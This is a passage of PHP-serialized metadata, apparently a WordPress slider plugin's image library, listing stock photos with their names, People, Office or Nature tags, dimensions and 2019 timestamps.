File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1278\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:159;a:12:{s:2:\"id\";s:3:\"440\";s:6:\"handle\";s:12:\"Lollipop.jpg\";s:4:\"name\";s:8:\"Lollipop\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1395\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:160;a:12:{s:2:\"id\";s:3:\"439\";s:6:\"handle\";s:26:\"People-crossing-street.jpg\";s:4:\"name\";s:22:\"People crossing street\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1278\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:161;a:12:{s:2:\"id\";s:3:\"438\";s:6:\"handle\";s:24:\"Friends-on-the-shore.jpg\";s:4:\"name\";s:20:\"Friends on the shore\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:162;a:12:{s:2:\"id\";s:3:\"437\";s:6:\"handle\";s:13:\"Coworkers.jpg\";s:4:\"name\";s:9:\"Coworkers\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:163;a:12:{s:2:\"id\";s:3:\"436\";s:6:\"handle\";s:27:\"Hiking-in-the-Dolomites.jpg\";s:4:\"name\";s:23:\"Hiking in the Dolomites\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:164;a:12:{s:2:\"id\";s:3:\"435\";s:6:\"handle\";s:18:\"Successful-man.jpg\";s:4:\"name\";s:14:\"Successful man\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:165;a:12:{s:2:\"id\";s:3:\"434\";s:6:\"handle\";s:23:\"Beautiful-sunny-day.jpg\";s:4:\"name\";s:19:\"Beautiful sunny day\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:166;a:12:{s:2:\"id\";s:3:\"433\";s:6:\"handle\";s:8:\"Guys.jpg\";s:4:\"name\";s:4:\"Guys\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:167;a:12:{s:2:\"id\";s:3:\"432\";s:6:\"handle\";s:19:\"Confetti-Shower.jpg\";s:4:\"name\";s:15:\"Confetti Shower\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:168;a:12:{s:2:\"id\";s:3:\"431\";s:6:\"handle\";s:24:\"Sun-was-setting-down.jpg\";s:4:\"name\";s:20:\"Sun was setting down\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:169;a:12:{s:2:\"id\";s:3:\"430\";s:6:\"handle\";s:9:\"Jumps.jpg\";s:4:\"name\";s:5:\"Jumps\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:170;a:12:{s:2:\"id\";s:3:\"429\";s:6:\"handle\";s:23:\"Friends-by-the-fire.jpg\";s:4:\"name\";s:19:\"Friends by the fire\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:171;a:12:{s:2:\"id\";s:3:\"428\";s:6:\"handle\";s:21:\"Under-the-blanket.jpg\";s:4:\"name\";s:17:\"Under the blanket\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1413\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:172;a:12:{s:2:\"id\";s:3:\"427\";s:6:\"handle\";s:18:\"Pretty-in-Pink.jpg\";s:4:\"name\";s:14:\"Pretty in Pink\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1394\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:173;a:12:{s:2:\"id\";s:3:\"426\";s:6:\"handle\";s:31:\"Discussions-at-a-long-table.jpg\";s:4:\"name\";s:27:\"Discussions at a long table\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1268\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:174;a:12:{s:2:\"id\";s:3:\"425\";s:6:\"handle\";s:18:\"Lost-in-Lemons.jpg\";s:4:\"name\";s:14:\"Lost in Lemons\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:175;a:12:{s:2:\"id\";s:3:\"424\";s:6:\"handle\";s:13:\"Team-work.jpg\";s:4:\"name\";s:9:\"Team work\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1281\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:176;a:12:{s:2:\"id\";s:3:\"423\";s:6:\"handle\";s:20:\"Romantic-evening.jpg\";s:4:\"name\";s:16:\"Romantic evening\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1263\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:36:58\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:177;a:12:{s:2:\"id\";s:3:\"422\";s:6:\"handle\";s:19:\"Crew-collective.jpg\";s:4:\"name\";s:15:\"Crew collective\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1278\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:178;a:12:{s:2:\"id\";s:3:\"421\";s:6:\"handle\";s:8:\"Code.jpg\";s:4:\"name\";s:4:\"Code\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:179;a:12:{s:2:\"id\";s:3:\"420\";s:6:\"handle\";s:48:\"Yellow-ceramic-mug-beside-gray-aluminum-iMac.jpg\";s:4:\"name\";s:44:\"Yellow ceramic mug beside gray aluminum iMac\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:180;a:12:{s:2:\"id\";s:3:\"419\";s:6:\"handle\";s:11:\"My-desk.jpg\";s:4:\"name\";s:7:\"My desk\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1315\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:181;a:12:{s:2:\"id\";s:3:\"418\";s:6:\"handle\";s:17:\"Cooperation-2.jpg\";s:4:\"name\";s:13:\"Cooperation 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:182;a:12:{s:2:\"id\";s:3:\"417\";s:6:\"handle\";s:33:\"MacBook-on-top-of-brown-table.jpg\";s:4:\"name\";s:29:\"MacBook on top of brown table\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:183;a:12:{s:2:\"id\";s:3:\"416\";s:6:\"handle\";s:27:\"Beautiful-working-place.jpg\";s:4:\"name\";s:23:\"Beautiful working place\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:184;a:12:{s:2:\"id\";s:3:\"415\";s:6:\"handle\";s:14:\"Typewriter.jpg\";s:4:\"name\";s:10:\"Typewriter\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:185;a:12:{s:2:\"id\";s:3:\"414\";s:6:\"handle\";s:19:\"White-desk-lamp.jpg\";s:4:\"name\";s:15:\"White desk lamp\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1282\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:186;a:12:{s:2:\"id\";s:3:\"413\";s:6:\"handle\";s:18:\"Office-working.jpg\";s:4:\"name\";s:14:\"Office working\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:187;a:12:{s:2:\"id\";s:3:\"412\";s:6:\"handle\";s:36:\"Silver-iMac-on-brown-wooden-desk.jpg\";s:4:\"name\";s:32:\"Silver iMac on brown wooden desk\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1240\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:188;a:12:{s:2:\"id\";s:3:\"411\";s:6:\"handle\";s:23:\"Working-in-progress.jpg\";s:4:\"name\";s:19:\"Working in progress\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:189;a:12:{s:2:\"id\";s:3:\"410\";s:6:\"handle\";s:15:\"Cooperation.jpg\";s:4:\"name\";s:11:\"Cooperation\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:190;a:12:{s:2:\"id\";s:3:\"409\";s:6:\"handle\";s:17:\"Working-place.jpg\";s:4:\"name\";s:13:\"Working place\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1281\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:191;a:12:{s:2:\"id\";s:3:\"408\";s:6:\"handle\";s:16:\"Working-desk.jpg\";s:4:\"name\";s:12:\"Working desk\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:192;a:12:{s:2:\"id\";s:3:\"407\";s:6:\"handle\";s:23:\"low-angle-of-forest.jpg\";s:4:\"name\";s:19:\"low angle of forest\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:193;a:12:{s:2:\"id\";s:3:\"406\";s:6:\"handle\";s:23:\"Lake-under-blue-sky.jpg\";s:4:\"name\";s:19:\"Lake under blue sky\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1351\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:194;a:12:{s:2:\"id\";s:3:\"405\";s:6:\"handle\";s:21:\"Blue-starry-night.jpg\";s:4:\"name\";s:17:\"Blue starry night\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:195;a:12:{s:2:\"id\";s:3:\"404\";s:6:\"handle\";s:22:\"Aerial-photography.jpg\";s:4:\"name\";s:18:\"Aerial photography\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1440\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:196;a:12:{s:2:\"id\";s:3:\"403\";s:6:\"handle\";s:14:\"Red-clouds.jpg\";s:4:\"name\";s:10:\"Red clouds\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:197;a:12:{s:2:\"id\";s:3:\"402\";s:6:\"handle\";s:14:\"Snow-field.jpg\";s:4:\"name\";s:10:\"Snow field\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1227\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:198;a:12:{s:2:\"id\";s:3:\"401\";s:6:\"handle\";s:13:\"White-sky.jpg\";s:4:\"name\";s:9:\"White sky\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1281\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:199;a:12:{s:2:\"id\";s:3:\"400\";s:6:\"handle\";s:24:\"Trees-covered-by-fog.jpg\";s:4:\"name\";s:20:\"Trees covered by fog\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1277\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:200;a:12:{s:2:\"id\";s:3:\"399\";s:6:\"handle\";s:26:\"Red-and-white-mushroom.jpg\";s:4:\"name\";s:22:\"Red and white mushroom\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:201;a:12:{s:2:\"id\";s:3:\"398\";s:6:\"handle\";s:24:\"Lake-near-pine-trees.jpg\";s:4:\"name\";s:20:\"Lake near pine trees\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:202;a:12:{s:2:\"id\";s:3:\"397\";s:6:\"handle\";s:35:\"After-a-long-day-of-backpacking.jpg\";s:4:\"name\";s:31:\"After a long day of backpacking\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:203;a:12:{s:2:\"id\";s:3:\"396\";s:6:\"handle\";s:32:\"Mountains-during-golden-hour.jpg\";s:4:\"name\";s:28:\"Mountains during golden hour\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New 